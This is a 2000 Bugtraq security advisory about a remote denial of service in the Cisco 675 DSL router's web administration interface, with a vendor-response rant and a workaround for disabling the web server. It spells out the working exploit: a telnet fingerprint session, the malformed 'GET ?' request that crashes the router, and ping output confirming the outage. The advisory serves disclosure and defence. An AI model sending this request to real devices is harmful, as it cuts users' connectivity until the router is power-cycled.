[LWN Logo]
[Timeline]
Date:         Tue, 28 Nov 2000 16:01:37 -0800
From: CDI <cdi@THEWEBMASTERS.NET>
Subject:      Cisco 675 Denial of Service Attack
To: BUGTRAQ@SECURITYFOCUS.COM

OK, since everyone is up-in-arms over vendor notification and their
response times, here's an example of what happens if you give a vendor too
-much- time. 
-----------------

Title : Cisco 675 Web Administration Denial of Service
Device: Cisco 675 DSL Router
Class : Denial of Service (remote)

Vendor Notified: January 10th, 2000 (Yes folks, 11 months ago)

Patch Available: Nope - see below

                  ---------------------------------

    The Cisco 675 DSL routers with the Web Administration Interface enabled
can be crashed (hard) using a simple GET request. CBOS versions 2.0.x
through 2.2.x have been found to be vulnerable. The new CBOS 2.3.x has not
been tested, but there are no notes in the 2.3.x changelogs to indicate that
they've fixed this problem. Effected 675s were configured in PPP mode. The
'Web Administration Interface' is enabled by default in CBOS revisions 2.0.x
and 2.2.x.

The Cisco 67x series of DSL routers are produced and distributed for
specific telcos to offer to their clients and as such, the installation base
is quite large. (To hazzard a guess, if just 20% of all Qwest DSL users are
using Cisco 675s, the installation base would exceed 25,000) The DSL
adapters in this series include: Cisco 673, Cisco 675, Cisco 675e, Cisco
676, Cisco 677, and Cisco 678. This advisory applies specifically to the 675
but other adapters in this series may have similar problems and should be
tested for vulnerability to this type of attack. I would be interested in
the results if someone has access to and can test the other adapters in this
series. The CBOS codebase is an aquired OS and as such, has no relationship
at all to the main Cisco IOS codebase.

Fix First:
    Disable the Web Based Administration Interface in your 675 until a
    patch or CBOS revision is made available.

  Web Server Disable commands: (2.0.x or better)
    (CBOS 'enable' mode) 
    cbos# set web disabled
    cbos# write
    cbos# reboot

Exploit:
    First find a 675 with the Web Admin server running.

Fingerprint:
    telnet vic.tim.ip.addr 80
    Connected to vic.tim.ip.addr.
    Escape character is '^]'.
    GET / HTTP/1.0
    HTTP/1.0 401 Unauthorized
    Content-type: text/html
    WWW-Authenticate: Basic realm="CISCO_WEB"

    <CENTER><h1>Unauthorized Access 401</h1></center>
    Connection closed by foreign host.

Now kill it:
    telnet vic.tim.ip.addr 80
    Trying vic.tim.ip.addr...
    Connected to vic.tim.ip.addr.
    Escape character is '^]'.
    GET ? [LF][LF]

(your telnet session dies here, and so does the router)

Dead as a post:
    ping -c5 vic.tim.ip.addr   
    PING vic.tim.ip.addr (vic.tim.ip.addr): 56 data bytes
    5 packets transmitted, 0 packets received, 100% packet loss

The Cisco never recovers - it's hosed until the router is power-cycled. A
simple 'GET ? \n\n' is all it takes to kill the router. In case you're
wondering, I had meant to enter 'GET /', but my finger slipped on the shift
key. Neat eh?

VENDOR RESPONSE: None, and I'll tell you why. (Warning, long rant ahead that
has nothing to do with the guts of this advisory.)

I first notified 'security-alert@cisco.com' in January of this year. Got an
immediate response and all seemed well. Then I didn't hear back from them
for a couple of months and promptly forgot all about this. Then in April the
'Cisco IOS Software TELNET Option Handling Vulnerability' (see
http://www.securityfocus.com/archive/1/56207) was announced. This
vulnerability was very similar to the Cisco 675 problem and I re-contacted
Cisco. They claimed they were "still working on replicating the error". Uh,
OK, whatever. I placed it on the back-burner and promptly forgot all about
it again because I didn't want to announce this vulnerability until a vendor
approved fix was available. (The installation base for this adapter is
humongous) Then in October of this year some discussion of a potential
problem with the Cisco 678 occured on the VULN-DEV mailing list. A Cisco rep
on the list had the audacity to complain about prior-notification. (Never
mind that VULN-DEV is designed specifically to investigate potential
vulnerabilities) Anyway, the issue was again brought before Cisco, they
again promised to address this issue.

The conversation on VULN-DEV prompted some private correspondence with CORE
SDI. The last I heard from Cisco was actually by way of Iván Arce at CORE
SDI who wanted more information regarding the Cisco 675 problem while he
investigated the CISCO IOS and it's Web Admin bugs. (See CORE-20002510,
BugTraq ID 1838) The vulnerabilities are strikingly similar even though IOS
is a completely separate codebase from CBOS. Anyway, CORE got word from
Cisco PSIRT that they would be addressing this issue by "mid November".

Needless to say, this hasn't happened yet.

This week's discussion of vendor notification and response times was just
gravy.

It should also be noted that since January, Cisco has released at least 2
updates to the CBOS 2.x series, without addressing this issue. (no mention
of it in their changelogs, although to be fair I've yet to have the
opportunity to test this bug against either 2.3.0 or 2.3.5.)

CDI
____________________________________
The Web Master's Net
http://www.thewebmasters.net/
    "Ok spammer, I'll 'just hit delete'. You can be 'Delete'."
                         --  Ron "SuperTroll" Ritzman, NANAE